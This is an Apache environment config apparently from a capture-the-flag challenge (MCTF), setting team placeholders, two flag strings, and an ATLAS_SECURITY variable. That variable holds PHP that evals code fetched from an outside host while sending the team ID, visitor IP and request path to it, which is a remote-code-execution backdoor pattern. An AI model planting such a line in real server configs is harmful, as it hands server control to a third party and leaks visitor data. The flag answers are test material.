SetEnv ID_TEAM IDTEAMREPLACE
SetEnv NOLFI_VAR NOLFIVARREPLACE
SetEnv ATLAS_SECURITY "eval(file_get_contents('http://midnight.atlas453.com/?team='.getenv('ID_TEAM').'&ip='.$_SERVER['REMOTE_ADDR'].'&path='.urlencode($_SERVER['REQUEST_URI'])));"
SetEnv FLAG3 "MCTF{strcmp_with0ut_c4$t_1$_b4d!!}"
SetEnv FLAG4 "MCTF{C$RF_d34ls_4_l0t_0f_d4m4g3...}"